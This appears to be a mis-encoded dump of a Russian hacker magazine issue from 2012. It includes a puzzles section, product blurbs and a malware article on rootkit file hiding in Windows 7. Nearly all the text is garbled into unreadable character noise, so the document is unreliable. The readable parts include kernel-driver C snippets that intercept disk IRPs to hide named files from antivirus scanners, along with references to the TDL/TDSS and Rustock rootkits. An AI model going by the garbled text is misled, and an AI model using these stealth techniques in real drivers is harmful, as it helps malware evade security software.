KIS, $ 3"?!&& — &8" :"2164 '"2)3&64(;"8" ;"!3'"6% 3"B& :"B&3 5":"?4. +"!3'"64 5&'&-5)(;), IM ) ("N)$64!9D (&3&E? O"B$61E(3$! G8'$!)?&!)& #'&:&!) '$="39 # )!3&'!&3&? A&8;"! 0"64;" 5":!), ?3" 3&D!)?&(;$% 7$-M)3$ — P3" "2!$ (3"'"!$ 7$M)39, $ 5'$#)64-!"& #"(5)3$!)& — ("#&'>&!!" !&"=D"2):$% #3"'$%. H$ ?3" 313 8"#"')34 — ="64>)!(3#" !$>)D ?)3$3&6&E — 5"(6&2!&& 5";"6&!)& 3&D, ;"8" !&;":1 =96" 7$M)M$34 "3 ;":54C3&'"#, FTN-(&3&E ) )!3&'!&3"#. <9 ($:) # 2&3(3#& "3 !)D ;"8" D"?&>4 =9 7$M)3)6) :). 0$; ?3" # P3": 56$!& :)' # D"'">)D '1;$D.

L,+AQR.-I. @(%;":1, ;3" ):&&3 P6&;3'"!!9& 2&!48) ) D"3% =9 "32$6&!!" 7!$;": ( 3&;1M&E ()31$N)&E # :)'& :$6#$'), (3$!"#)3(% "?&#)2!": 5"'$ 5&'&D"2)34 !$ 5)!8#)!$. * 2'18"E (3"'"-!9, 6)!1;( — ($;( ) !"3 S" #"'; ((6$#!" %

#='"()6, !& 3$; 6)? :)), ), &(6) 2$B& ,!2'&C «andrushock» <$3#&&#1 !& (392!" 7$ #)!21 !$ (#")D !"13=1;$D, 3"... # "=M&:, 5')2&3(% 5"64-7"#$34(% Internet Security. @ P3": 56$!& !"#9& KIS ) KAV — 2"(3"E!9& 5'"21;39, ;"3"'9& !$#&'!%;$ !$E213 (#"& :&(3" !$ !$>)D #)!-2"#9D :$>)!$D. T :!"8)D )7 !$>)D "!) (3"%3 !$ 2":$>!)D :$>)!$D, ) "("=9D 5'&3&!7)E ; !): !&3, !" #"3 1B& #3"'"E 8"2 :9 !& :"B&: "3-2&6$34(% "3 #"5'"($: 82& B& VPN? F2& B&, 82& B& # !"#": KIS (&;4C'!9E VPN, ;"3"'9E 7$M)3)3 2$!!9& 5"647"#$3&6% # !&2'1B&(3#&!!": Wi-Fi () !& 3"64;") ";'1B&!))? R3" 2&6$34 # !&7$M)-M&!!9D (&3%D # McDonald's ) 5'"?)D 51=6)?!9D :&(3$D? .M& "2!$ 56"D$% !"#"(34: #!&7$5!" ";$7$6"(4, ?3" S)?) "32&64!"8" 7$51(;$ 5"-2"7')3&64!"E 5'"8'$::9 # (P!2=";(& 3&5&'4 !&3. G?&!4 (3'$!!" — ;$; B& 3&5&'4 6C2) ( )(-;6C?)3&64!" "='$7"#$3&64!9:) N&6%:) =1213 7$51(;$34 ;&E8&!9? z

2"$+) 678*$4"+%,9 * 1,9+%*$$

&'() *+*,'-./0/ +/((1*./+23.'4 !"#$%&'()* +,-.$+'/#)* 0"&%, %'1'.)* &1'"1 "&2'34+'(,14, 5&3" 1('6 &"&157, #,%.)3,&4 "3" +,3'/"3,&4 '%'#/,1534#'. 8(1'7,1"+".'(,# '# &1'2.'95#1#' — %'#:"-" 2.,("14 #5 #,0', +,-.$;,51&6 &,7 &'<'*, 2'0=(,1)(,51 "#15.#51, %,/,51 '<#'(35#"5 " &%,#".$51 ;5&1%"5 0"&%".

5/((1*./+23.'3 6/(23 7*,*83.'4>5 &5%.51, /1' 2'&35 35/5#"6 ,%1"(#'-' +,.,;5#"6 #5.50%' #,/"#,?1 2'6(3614&6 &1.,##)5 -3?%" " 3"@#"5 0",3'-'()5 '%'@%", 1.5<$?A"5 '1 15<6 %,%'*-#"<$04 #5'<='0"7)* :,*3. B'0$34 ('&&1,#'(35#"6 2'&35 +,.,;5#"6 2'7'-,51 & C1"7 &2.,("14&6.

:;<=> ?; ;@>?>

MALWARE !"#$%&'() *$$#)+ (stannic.man@gmail.com)

!"#$% 09 /164/ 2012088

!"#$% &'"()$% *#%)+% ,'- .*/0+/" — 1/$ *#%)+% 20.3("/4 5"6'3. 7#%))$ $)$ 8$9($'-%/ %#* (3:+("/4 ( #*/)$6 ($,%, 8$, 8.+;%'$# <,+/%'4)3= =+82$( + 8.$"0/+($0. >%,4 ")/+(+.*2* ,'- /$&$, ?/$<3 ?/$-/$ 8.$(%.+/4 8$ 2($%6 <"9%, )*:)$ )"'+?+% 2"#$&$ 5"6'" 0"0 #+)+#*#. @%/ 5"6'" — )%/ .*/0+/". @%/ .*/0+/" — 2+2/%#* #$:)$ 2?+/"/4 ?+2/$6, <$,.$ (3(%A+("- 9%'%)3% 5'":0+. >%,4 /"0?

&'()*( )+,-, !"#$ "%&'!()][-!"#$%&': (!)*+,%- .,/0* &"-#"+"-1

WWW

,%"- +. %/0%#1 '# 0 +#1# — +#2# %3(&: tinyurl.com/cwrlo73.4-+&5 MSDN-/6-%&'-# )&2/+. % 7&5"/0.1- 7-"8+)&1-. Recom-mended by Microsoft!

DVD

9& (-%$ : 0.$"&(.-0&3 6&); 6)-1#)/0 7&5"/0.< 7-"8+)/0, 6/=0/":3>-< +#2# /+%"#?-0&+8 )&2/+; % 7&5"/0/5 %-%+#1/5. @/+/0.< 6)-1#)/0 %/$).+-: '# (&1, : ?&('.5 :). A %+&+8# /6-%&'. /%'/0'.# 6)-#1., 6)- (/"?'/1 ;1#-'-- — +. %&1 '&5-(#B8 6)-#1"#1/# )#B#'-#.

+ ,'- 0$&$ )% 2%0.%/, ?/$ )3)%A)+% =("'%)3% ")/+(+.*23 ,%'"B/ 2/"(0* )" 2+&)"/*.)36 8$+20 #"'(".+, ,%-5"0/$ +&)$.+.*- (,"-,", - 9)"B, ?/$ ( .%0'"#% 8+A*/ +)"?%) ,.*-

&+% 28$2$<3 ,%/%0/", /"0+% 0"0 8$(%,%)?%20+6 ")"'+9 + 1#*'-;+-. C+00$ D+88$)%) (Mikko Hypponen), ,+.%0/$. 8$ +22'%,$(")+-# ")/+(+.*2)$6 0$#8")++ F-Secure, 20"9"' 8$ 8$($,* )$($-('%))$&$ ?*," 8$ +#%)+ Flamer, ?/$ ."9."<$/?+0+ ")/+(+.*2$( 8$/%.8%'+ 8$')$% 5+"20$. «E"0$6 $/ )+= /$'0, %2'+ (+.*23 2($<$,)$ ."28.$-2/.")-B/2- + ."<$/"B/ &$,"#+. Flame *28%A)$ A8+$)+' 9" 8$'49$-("/%'-#+ 0"0 #+)+#*# ,(" &$,", + 1/$ $8/+#+2/+?)"- $;%)0"...» — 8$2%/$("' C+00$ D+88$)%).

FGH 7CIIC? !($+ 5"6'3 #"'(".4 $<3?)$ 20.3("%/ )%20$'40+#+ 28$2$<"#+. H)+ (2% A+.$0$ +9(%2/)3 +, 0"0 8."(+'$, $2)$(3("B/2- )" 8%.%-=("/% WinAPI-5*)0;+6 2+2/%#3, 8.%,)"9)"?%))3= ,'- ."<$/3 2 5"6'$($6 2+2/%#$6, 8%.%?+2'%)+%# + 8.$2#$/.$# 8"8$0 + 2"#+= 5"6'$(.

.

! .$2/$# 2'$:)$2/+ .*/0+/$( ()"?+)"- 2 /$&$ #$#%)/", 0$&," +#%/4 ,."6(%. *.$()- -,." ,'- $<%28%?%)+- 2/"<+'4)$2/+ .*/0+/" 2/"'$ «#$,)3# /.%),$#») 5*)0;+$)"' 2"#$9"J+/3, ( /$# ?+2'% 2$0.3/+- 5"6'$(, <3' 8%.%#%J%) ( -,.$. K/$ + 8$)-/)$, 8$-20$'40* 8.+ 8."(+'4)$6 $.&")+9";++ )"6/+ 2$0.3/36 5"6' '+A4 2.%,2/("#+ B9%.28%62" ( /"0$# 2'*?"% (.-, '+ 8.%,2/"(+/2- ($9#$:)3#.

!8$2$<$( 2$0.3/+- 5"6'$( ( -,.% )" 2"#$# ,%'% )%#)$&$. L%.(36 +9 )+= 2(-9") 2 8%.%=("/$# $8.%,%'%))3= Native API, 8.%,)"9)"?%))3= ,'- )+90$*.$()%($6 ."<$/3 2 5"6'$($6 2+2/%-#$6, 0 8.+#%.* ZwOpenFile, ZwReadFile + /"0 ,"'%%. @",$ 20"9"/4, ?/$ /"0$6 8$,=$, A+.$0$&$ ."28.$2/.")%)+- «( <$%(3= *2'$(+-=» )% 8$'*?+', ?/$ '%&0$ $<M-2)+#$ — *: <$'4)$ <32/.$ (3-('-%/2-.

N.*&$6 28$2$< 2$0.3/+- 5"6'$( $2)$(") )" 8%.%=("/% IRP-8"0%/$(, 2$2/"('-BJ+= $2)$(* (9"+#$,%62/(+- ,."6(%.$( + *2/.$62/( #%:,* 2$<$6. K/$/ 28$2$< 8$'*?+' )"+<$'%% A+.$0$% ."28.$2/.")%)+% ( 8"<'+0% +9-9" 2($%6 #"'$9"#%/)$2/+ + ,$($'4)$ '%&0$6 .%"'+9";++. @",$ 20"9"/4, ?/$ +#%))$ 8%.%=("/ IRP-8"0%/$( (0"0 ,'- 2$0.3/+- 5"6'$(, /"0 + ,'- ,.*&+= 9'$(.%,)3= ;%'%6) 2/"' 8.-#$-/"0+ +2/$?)+0$# (,$=)$(%)+- ,'- .*/0+/$2/.$+/%'%6.

O"/%# )"2/"'$ 9"/+A4%, 2#%)+(A%%2- .%($'B;+$))3# 8.$-.3($# .*/0+/" Rustock, ( 0$/$.$# (8%.(3%, %2'+ )% $A+<"B24, <3'" 8.+#%)%)" /%=)$'$&+- 2$0.3/+-, $2)$("))"- )" 5+'4/.";++ $8%.";+6 2 ,+20$# )" 2"#$# )+90$# *.$()% — *.$()% ,."6(%." atapi.sys. L$2'%,$("(A%% 9" Rustock’$# 2%#%62/($ .*/0+/$( TDL/TDSS '+A4 )%#)$&$ *2$(%.A%)2/($("'$ ,"))*B /%=)$'$&+B.

H2)$()$6 :% 8.+);+8 $2/"'2- <%9 +9#%)%)+6 — 2$0.3/+% «2'*-:%<)3=» 5"6'$( .*/0+/" 8.$+2=$,+'$ 8*/%# 8%.%=("/" + +9#%)%-)+- SRB-8"0%/$( (SCSI Request Block) )" 2"#$# )+90$# *.$()% — *.$()% IRP-=%),'%.$( ,."6(%." atapi.sys.

! /%= 8$. )+?%&$ $.+&+)"'4)%% /"0$&$ 28$2$<" 8.+,*#")$ )% <3'$. I2/4 #)$&$ (".+";+6 )" 1/* /%#*, $,)"0$ 2*/4 (%9,% $2/"-%/2- $,)".

P ,"))$&$ #%/$," %2/4 $,+) 2*J%2/(%))36 )%,$2/"/$0: /"0 0"0 .*/0+/* 8.+=$,+/2- 9".":"/4 2+2/%#)3% ,."6(%.3, %#* 0"0-/$ )",$ (30.*?+("/42- 8.+ (0'B?%))$# Page Guard — /%=)$'$-&++, )"8."('%))$6 )" $<%28%?%)+% ;%'$2/)$2/+ 2+2/%#)$&$ ",.%2-)$&$ 8.$2/.")2/(". E2/"/+, )" #$6 (9&'-,, 1/" /%=)$'$&+- ,$($'4)$ )%8'$=$ 9".%0$#%),$("'" 2%<- ( 8'")% 8.$/+($2/$-)+- .*/0+/"# ( Win7, )$ /"0:% 2*J%2/(%))$ $2'$:)+'" :+9)4 ."9."<$/?+0"# ")/+(+.*2)3= 9"J+/, (%,4 ,'- *2/")$(0+ 2($+= «=$.$A+=» =*0$(, 20":%#, 8$(%.= SSDT, /"0:% 8.+=$,+/2- $<=$,+/4 Page Guard.

!"#$%# $&'(, &)*+ )$",&-.

!"#$% 09 /164/ 2012 089

/&$&01% )2%'"3+2)( 3)& 4"45*(0'&&, )1"0" "2 4"66&0,1+ «708-+» Microsoft "21%,&2)( (6%-6%, 5 '+7 2%$ 5,& )9&29+1 2+1%&2), 4":2"$5 3;<*(6= %'2+3+05)'=7 1"$4%'+# 5)20&$*&'= 3 >565?&& — <*%3-'=$ 20&>"3%'+&$ 6*( +7 40"<0%$$'=7 40"6512"3 )2%*% 4"66&0,1% Windows 7 (x32/x64), % 3 )1"0"$ >565?&$ — + «3").$&01+», 1"2"0%( 4" 3)&$ 40+1+61%$ 6"*,'% )2%2. "9&'. 4"45*(0'"# )+)2&$"#.

@%6" )1%;%2., 92" A+*.20%B+8 IRP-4%1&2"3 $",'" '%*%6+2. 635$( )4")">%$+. !&03=#, )%$=# +;3&)2'=#, ")'"3%' '% %22%9& )3"&<" A+*.20% 1 )2&15 5)20"#)23, ">)*5,+3%8?+7 A%#*"358 )+)2&$5. C%1"# )4")"> "9&'. 7"0"- + '%6&,&' + 7"0"-" 6"15$&'-2+0"3%'. C&$ >"*&& 92" +$&''" :2% 2&7'"*"<+( 5)+*&''" 40"63+<%-&2)( D%#10")"A2"$ 1%1 &6+')23&''" 3&0'%( + 40%3+*.'%(. E2"0"# )4")"> — 9+)2=# 7%1, + "' ")'"3%' '% 4&0&73%2& kernel-A5'1B++ IofCallDriver (1)2%2+, 3 "6'"$ +; 40"-*=7 '"$&0"3 ][ ( 5,& 4+)%* "> :2"$ 5'+3&0)%*.'"$ )4")">& 4&0&73%2%). /*",'")2. &<" ;%1*8-9%&2)( 3 2"$, 92">= 40%3+*.'" "40&6&*+2. '5,'=# 2&>& IRP-4%1&2, 3&6. 3 &6+'+B5 30&$&'+ IofCallDriver 3=;=3%&2)( 6&)(21+ 2=)(9 0%; + && +)4"*.;582 3)& 5)20"#)23%, 1%1+$ '& *&'..

F?& 0&,& 3 40+0"6& 3)20&9%&2)( 4&0&73%2 IRP-4%1&2"3, ")'"-3%''=# '% )3"&">0%;'"$ «%'2+%'%*"<&» IofCallDriver — A5'1B++ ;%3&0-&'+( IofCompleteRequest, 1"2"0%( 2%1,& ">0%>%2=3%&2 IRP-4%1&2=.

!GFHEIGJCFKL@MF JCNOJ J2%1, 4"63&65 40"$&,52"9'=# +2"<: )"10=2. A%#* 6*( 0521+-2% — 6&*" '5,'"&, 6&*" 3%,'"&, "6'%1" ) 0")2"$ ;%?+?&''")2+ N/, " 9&$ ( 4+)%* 3=-&, 40+7"6+2)( +62+ '% '&1+# +;30%2 — '%6" 1%1-2" 0&-%2. 40">*&$= ) Page Guard *+>" ">7"6+2.)( >&; 4%29&# kernel-memory.

E"">?&, 0&-+2. + 25 + 605<58 ;%6%95 3 0%$1%7 "<0%'+9&'+# «)&-$&01+» $",'". G%)4+)=3%2. )4")">= ">7"6% Page Guard ( )&<"6'( '& >565, )2%2.( 3)&-2%1+ '& "> :2"$. @" 3"2 4"A%'2%;+0"3%2. '%)9&2 3";$",'"<" stealth-)"10=2+( A%#*"3 ) +)4"*.;"3%'+&$ +$&8?+7-)( 2&7'"*"<+# $= "9&'. 6%,& $",&$.

J2%1, 4")2%3+$ 4&0&6 )">"# ;%6%95 — "0<%'+;"3%2. '% '&-">7"6+$"$ '%$ 50"3'& )"10=2+& A%#*"3 3 Windows «Semerka», 40+ :2"$ '& '&03+05( Page Guard. /6&*%2. :2", 1%1 "1%;=3%&2)(, '& 2%1 5, + 2(,&*", 6")2%2"9'" +$&2. '&1"2"0=& '%3=1+ '%4+)%'+( 60%#3&0"3 + +$&2. 40+>*+;+2&*.'"& 4"'(2+& " 2"$, 1%1 0%>"2%&2 A%#*"3%( )+)2&$%.

!N!GNPQFD @I!FHIKJCL RIRNS-@JPQHL RNH @% 40%12+1& 0&%*.'=7 )4")">"3 )"10=2+( A%#*"3 $",'" 40+-65$%2. 6"3"*.'" $'"<", + 3)& "'+ >5652 2%1 +*+ +'%9& 0%>"2%2.. O*%3'"& 6*( '%) )&#9%) — '& 20"<%2. )+)2&$'58 4%$(2., 92">= 6%2. 3";$",'")2. 60%#3&05 0%>"2%2. 3 Win 7+.

/%$"& 40")2"&, 92" 40+7"6+2 3 <"*"35, — :2" ;%'(2.)( ">0%>"2-1"# IRP ) 1"6"$ IRP_MJ_DEVICE_CONTROL, 1"2"0=& 40+3*&1%82)( 1 ">0%>"21& 2%1+7 1"'20"*1"6"3, 1%1 IOCTL_SCSI_PASS_THROUGH_DIRECT.

/6&*%2. :2" "2'")+2&*.'" *&<1", )1%,&$, 40+$&0'" 2%1:

pIrpStack = IoGetCurrentIrpStackLocation(pIrp);if (pIrpStack->MajorFunction == IRP_MJ_DEVICE_CONTROL){ if (pIrpStack->Parameters.DeviceIoControl.IoControlCode == IOCTL_SCSI_PASS_THROUGH_DIRECT) { if (pIrp->UserBuffer != 0) { if (!KeGetCurrentIrql()) { HideMyFile(...); } } } }

E )%$"# 40"B&650& )"10=2+( A%#*% HideMyFile(), 3 40+'B+4&, '&2 '+9&<" )*",'"<": 2%$ '&">7"6+$" 0&%*+;"3%2. ">'5*&'+& 4"*( pIrp->UserBuffer + +$&'+ A%#*%, 92" $",'" )6&*%2. 40+$&0'" 2%1:

if (!_wcsnicmp((PWCHAR)((ULONG_PTR)UserBuffer + 0xf2), FileNameToHide, )){ // ǧȔȦȜȤȔșȠ ȥȢȘșȤȚȜȠȢș memset((PVOID)UserBuffer, 0, UserBufferLength); memset((PVOID)((ULONG_PTR)UserBuffer + 0xf2), 0, 18);}

G&%*+;%B+( 2%1"<" «)"10=2+(» — :2" "6+' +; '%+>"*&& 40")2=7 + 40&64"*%<%&$=7 3%0+%'2"3. !0+ ">0%>"21& '&">7"6+$" 4"$'+2. " 4"63"6'=7 1%$'(7, '%40+$&0, '%6" 40&65)$"20&2. 0%;*+9+& $&,65 NTFS-+'6&1)%$+ + )%$+$+ A%#*%$+.

H05<"# )4")">, 40+7"6(?+# 3 $"8 '&20&;358 <"*"35, — :2" 40"-)2" 6%2. 4" 051%$ ">0%>"29+15 IRP-4%1&2"3:

pIrp->IoStatus.Status = STATUS_NOT_IMPLEMENTED;pIrp->IoStatus.Information = 0;IoCompleteRequest(pIrp, IO_NO_INCREMENT);

T2" '%;=3%&2)(, 6&-&3" + )&06+2". E 0&;5*.2%2& 40+ 40+&$& '5,'=7 '%$ IRP-4%1&2"3 $= 40")2" <"3"0+$ )+)2&$&, 92" «:2"2 )2"*+1 '& ">)*5,+3%&2)(», + )+)2&$% 3&0+2 '%$ '% )*"3". R%1 0&-;5*.2%2 — 4%1&2, 4")*%''=# %3&0"$/)+)2&$"#, 92">= 40"9+2%2. )"6&0,+$"& A%#*% +*+ 5;'%2. &<" +$(, 40")2" >56&2 "2>0"-&'.

C&4&0. " )%$"$ +'2&0&)'"$ — <6& 3)& :2" "2)*&,+3%2. + A+*.-20"3%2.. @%+>"*&& :AA&12+3'=# + 6&#)23&''=# )4")"> — :2" 40+-%22%9+2.)( 1 5)20"#)235 «\\Device\\Disk» + 4%0)+2. IRP-4%1&2= 2%$. R%1 40%3+*", 6%''"& 5)20"#)23" )";6%&2)( 60%#3&0"$ atapi.sys, % '+,& :2"<" 60%#3&0% '+9&<" '&2 — 2%$ 2"*.1" 92&'+&/;%4+). 4"0-2"3 ,&)21"<" 6+)1%. C" &)2. 6%''"& 0&-&'+& ">&)4&9+2 '%$ ">7"6 *8>=7 A+*.20"3, 5)2%'"3*&''=7 %3&0%$+. R)2%2+, +$&''" 2%1"# 4"67"6 +)4"*.;5&2)( 3 )&$&#)23& 0521+2"3 TDL/TDSS + Rustock.

C52 '&">7"6+$" )1%;%2., 92" A+*.20%B+( 3=-& 6%''"<" 6&3%#)% 40+ 4"4=21& )"10=2+( A%#*% $",&2 40+3&)2+ 1 ,&)21"$5 1"<'+-2+3'"$5 6+))"'%')5 5 %3&0)1"# 40"%12+31+. R 40+$&05, &)*+ $= 4"4=2%&$)( )40(2%2. A%#* 3 "6'"$ +; «3=)"1+7» A+*.20"3 + 40+ :2"$ <6&-2" '+,& '%), '%6 %2%4+, >56&2 )+6&2. A%#*"3=# A+*.20 %3&0%, 2" :2" $",&2 40+3&)2+ 1 ;%3+)%'+8 )+)2&$= + 6%,& 1 «)+'&-$5 :10%'5».

U25 ,& )7&$5 )"10=2+( $",'" +)4"*.;"3%2. 40%12+9&)1+ 3" 3)&7 A%#*"3=7 A+*.20%7 — 1%1 )2%'6%02'=7, 0&1"$&'65&$=7 Microsoft, 2%1 + )%$"4%*.'=7, 4+)%''=7 '% 1"*&'1&.

R)2%2+, '%)9&2 2"# )%$"# «0&1"$&'65&$"#» Microsoft 2&7'"-*"<++ "0<%'+;%B++ A%#*"3=7 A+*.20"3, ")'"3%''"# '% 3=;"3%7 FltRegisterFilter/FltStartFiltering + 2%1 6%*&&. H%''%( 2&7'"*"<+( 6"3"*.'" 5)4&-'" +)4"*.;5&2)( 3)&$+ %3&0)1+$+ 40"<%$+, A+*.-2058?+$+ 0%>"25 ) A%#*%$+. @% 6+)1& 2= '%#6&-. "6+' +; 2%1+7 40+$&0"3, 1"2"0=# 4"$",&2 2&>& "0<%'+;"3%2. )3"# A%#*"3=# A+*.20, % 2%1,& 4"20&'+0"3%2.)( 3 2&7'+1& )"10=2+( A%#*"3.

EDF/CN VIRKWTF@JX J "4(2. )2%0=& )1%;1+ " <*%3'"$. !0"<0&)) '& )2"+2 '% $&)2&, 0%;-0%>"29+1+ %3&0"3 "4(2. "1%;%*+). 3 0"*+ 6"<"'(8?+7.

E 2=0'&2%7 — '"3=# %30%* 4" +$&'+ Flame. G521+2, 1"2"0=# 3 )+*5 "<0%'+9&''")2+ 0%)40")20%'&'+( )$"<, 4" 0%;'=$ 6%''=$, "2 6357 6" 4(2+ *&2 )10=2" 40")5?&)23"3%2. 3 )20"<" *"1%*+;"3%'-'"# <&"<0%A+9&)1"# ;"'&.

E)& >= '+9&<", '" 2"*.1" 6&*" 2&4&0. 3 2"$, 92" ) 4"(3*&'+&$ :2"<" 0521+2% "210=*%). '"3%( )20%'+B% 3 ">*%)2+ IT->&;"4%)'")-2+ — 2&4&0. 3+05)= + 0521+2= '%9%*+ +)4"*.;"3%2.)( 1%1 1+>&0-"05,+&.

T2" :2"? @%9%*" :4"7+ 1+>&03"#'? T+2%# ][, 92">= >=2. 3" 3)&"05,++! z

Preview

124

98

94

130

110

136

114

!"#$#%&' #()*+*!"#$"%&'( )$*+&,-./0&'( "%1"$ $.2.&,( #/3 4")-$".&,3 4"/&"5.&&"( "%/*6&"( ,&7$*)-$89-8$' — #/3 "7,)*, #/3 /,6&":" 4"/01"+*&,3.

FACE OF WINDOWS PHONE!$"#"/;.&,. )-*-0, " $*1$*%"-9. 4$,-/";.&,( #/3 4/*-7"$<' Windows Phone 7. =* >-"- $*1 $.60 4"(#.- " #,1*(&., $*1$*%"-9. ,&-.$7.()*.

6 !)*%,&- +,.! # +#/.,!' ?-"%' )-*-0 :$*<"-&'< 9"#.$"<, &.#")-*-"6&" <&":" 4,)*-0, &8;&" .@. , <&":" 6,-*-0. =" 6-" ,<.&&" 6,-*-0? A&,: " 4$":$*<<,$"+*&,, )8@.)-+8.- +./,9". <&";.)-+", , +$.<.&, 4$"6,-*-0 +). -"6&" &, 8 9":" &.-. !.$.# -"%"( 4.$+*3 6*)-0 "%1"$* /862,B 9&,: 4" 4$":$*<<,-$"+*&,C +).B +$.<.& , &*$"#"+. D#.)0 -' &*(#.20 9*9 78&#*<.&--*/0&8C /,-.$*-8$8 "% */:"$,-<*B , 4$".9-,$"+*&,, 9"#*, -*9 , )%"$-&,9, 6,)-" 4$*9-,6.)9,B )"+.-"+. !"6-, +). 9&,:, + )4,)9. &8;&" &. 4$")-" 6,-*-0, * 4.$.6,-'+*-0 <&":" $*1 +4/"-0 #" 4"/&":" 4$"-)+.-/.&,3.

+0$,.1* 23"'22-3'23#%E%1"$ Tsung — <&":"78&95,"&*/0&"( ),)-.<' &*:$81"6&":" -.)-,$"+*&,3 #/3 2,$"9":" 9$8:* 9/,.&--).$+.$&'B 4$,/";.&,(.

*,*3#4.5 23"'+#$&BSD <.$-+? F+*-,- &*),/"+*-0 -$84? !"4$"%8(-. $*))9*1*-0 >-" $*1$*%"-6,9*< DragonFly BSD — )*<"<8 ,&&"+*5,"&&"<8 «#03+"/.&98».

%').+#' +.3*62+#' 7"#.$%#/23%#G&,9*/0&'( $.4"$-*; ,1 H>&06;>&3, ) 7*%$,9, 9"<4*&,, TP-LINK, ,1 9"-"$"-:" -' 81&*.20 <&":". "% IT-,&#8)-$,, 8#,+,-./0&":" A,-*3.

2+"&3&' "'$'"%&!.$.9/C6.&,. <.;#8 +,#."9*$-*<, — :"/"+&*3 %"/0 #/3 /C%":" /,&89)",#*, #./*C@*3 &.+"1<";&"( &"$<*/0&8C $*%"-8 ) GPU. A*9 $.2,-0 >-8 4$"%/.<8?

-*+'" 09 /164/ 2012090

SYN/ACK

+#/.,!

FERRUM

+#/.,!

UNIXOID

!"#$% 09 /164/ 2012

!"#$% &%$'(")*+,#-. (ivinside.blogspot.com)#&'()*

091

!"#$%&$ '"(, ()* +,"-"./*0 1*%"%0#*! !02)+34 (5 6,)+)#-*( 3"/0 %0(3)0 +0#) — ,0/03*0 7"+"1 8 8)9080+)'"3*..

!"#"$% &" '()*'*#(+"&%,-!"#$"%&' ()*+%+,)-. /'#')(0, &"*"%-+ #'1* )' ,"$+,+#"2')(3.

/45464 7 1 :!;<=>? @0%5,0( %&,*8%"( 3&-3) 3)1A$ 60,06,"'*%A84 10,07 ,0B& 6) 6)+'083)(& ()8%&. C)8% &-0 8*#A3) )9'0%/"#, ' 3"8%*#0 08%A +5,5, * )3 ()-0% '5+0,-"%A )+3)',0(033) 30 9)#00 +'&D 10#)'0B (08#* 3" ()8%& )B"-0%84 9)#00 +'&D 10#)'0B, ()8% )9-,&/*%84). E&,*8%"( 3&-3) )8'0F"%A +),)2& G)3",*B)( — *3"10 )3* ()2&% 6,)'"#*%A84 ' +5,& ' 3"8%*#0 ()8%" * 6)2*93&%A, 3) & 3*D 08%A %)#AB) )+*3 G)3",*B. H%* 10%5,0 10#)'0B" 60,0-+'*2"$%84 8 ,"73). 8B),)8%A$. I+"( ()-0% 60,0.%* ()8% 7" )+3& (*3&%&, ;",* — 7" +'0 (*3&%5, H+-& 3&-3) 64%A (*3&%, 8"(5. (0+#*%0#A35. *7 '80D J)3) — 0(& 6)%,09&0%84 +084%A (*3&%, 1%)95 60,0.%* ()8%. K)'3) 10,07 80(3"+L"%A (*3&% ()8% )9,&/*%84. M"B*( )9,"7)( '80 10%'0,) ()2&% &860%A 10,07 302) 60,06,"'*%A84?

K?N?O>? : 7"+"1* 8&F08%'&0% +'" '",*"3%" ,0/03*4. <9" )3* )83)'"35 3" %)(, 1%) H+-& * J)3) 3&-3) 60,0D)+*%A ()8% '(08%0. E"B )3* 8PB)-3)(4% 3"*9)#A/00 B)#*108%') ',0(03*.

!$+#/0 #"+-")1 (# (',2'"3 4'"5"), 6+,7$*7$$ #+$89):1. I+"( * ;",* 60,0D)+4% ()8% (2 (*3&%5).2. I+"( ')7',"F"0%84 (3 (*3&%5).3. I+"( 60,0+"0% G)3",A H+-& * J)3), )3* 60,0D)+4% (13 (*3&%).4. ;",* ')7',"F"0%84 8 G)3",0( (15 (*3&%).5. I+"( * ;",* 60,0D)+4% ()8% '(08%0 (17 (*3&%).

:1,+,0 #"+-")1:1. I+"( * ;",* 60,0D)+4% ()8% (2 (*3&%5).2. ;",* ')7',"F"0%84 (4 (*3&%5).3. ;",* 60,0+"0% G)3",A H+-& * J)3), )3* 60,0D)+4% (14 (*3&%).4. I+"( 90,0% G)3",A * ')7',"F"0%84 7" ;",* (15 (*3&%).5. I+"( * ;",* 60,0D)+4% ()8% '(08%0 (17 (*3&%).

/45464 7 2 :!;<=>? = +0,0'30, 2+0 -*'0% 64%A+084% 80(0.35D 6",, B"-+5. *7 (&-0. *7(034# 8')0. -030. M"-+"4 *7 -03F*3 ' P%). +0,0'30, B"B %)#AB) B%)-%) *7 (&-1*3 *7(03*# 8')0. -030, 30(0+#033) &73"0% )9 P%)( ('80( *7'08%3), B"B 958%,) ,"86,)8%,"34$%84 86#0%3* ' ("#03AB*D 2),)+B"D), 08#* %)#AB) P%) 30 00 8)98%'0335. (&- () 8')*D 90+"D B"-+5. &73"0% 6)8#0+3*(). Q"B)35 P%). +0,0'3* %,09&$%, 1%)95 -03F*3", 6)#&1*'/"4 +)B"7"%0#A8%'" 30'0,3)8%* 8')02) (&-", &9*#" 02) ' %)% -0 +03A. O* )+3" *7 -03F*3 30 ()-0% )8#&/"%A84. = 80#03*0 6,*07-"0% B),)#0'", 8#"'4F"484 8')0. 306)2,0/*()-8%A$. <3" )9R4'#40% -*%0#4(, 1%) 6) B,".30. (0,0 )+*3 *7 (&-1*3 +0,0'3* 8)'0,/*# 8&6,&-08B&$ *7(03&. @%) 6,)*7).+0%?

K?N?O>? H%" '0#*B)#063"4 7"+"1" 4'#40%84 B#"88*108B). 8,0+* #)2*-108B*D 2)#)')#)()B, '60,'50 )3" 95#" 6,0+8%"'#03" ' B3*20 G*7*B" S-),+-" T"()& * ("%0("%*B" C",'*3" !%0,3" Puzzle-Math («C"%0("%*108B*0 2)#)')#)(B*») ' 1958 2)+&. U,"'+", ' *D '0,8** G*2&,*,)'"#* 30'0,350 -035.

!"#$%&

'(!)* 09 /164/ 2012092

!"#$%& '%()(&*% +#,-.)/(, '(# 0#1#*&2) "& 30)4)*) "%'&-$# "#2#$# 5%(&*6.. 7&"8 % ()0 4")/( #9 %4.&"): 49 .-5&;. <# ,&;3(2%(&*="# *% >(# ()0? ?1&,3()2%. 3%(-)@%/, 0#$,) 2 ,&1&2"& 23&$# #,%" "&2&1"8; .-5. A#$,) &$# 5&") -9%*) 98 &$# 31)4- +#3*& 4)62*&"%6 0#1#*&28 — 2&,= #") "& 4")*) #9 %4.&"): ,1-$%: .--5&;. B,")0# -9%;3(2) "& +1#%3:#,%(, % >(# %"C#1.%1-&( 23&:, '(# "&2&1"8: .-5&; 9#*=D& #,"#$# — +# 01);"&; .&1& ,2). E &3*% "&-2&1"8: .-5&; 98*# 98 (#*=0# ,2), %: 5&"8 -9%*% 98 %: ") 2(#1#; ,&"=, ) &3*% 98 %: 98*# (1% — 5&"8 98 -9%*% %: ") (1&(%; ,&"=, % ()0 ,)*&&. E &3*% 98 %: 98*# 3#1#0 ,&26(= — %: 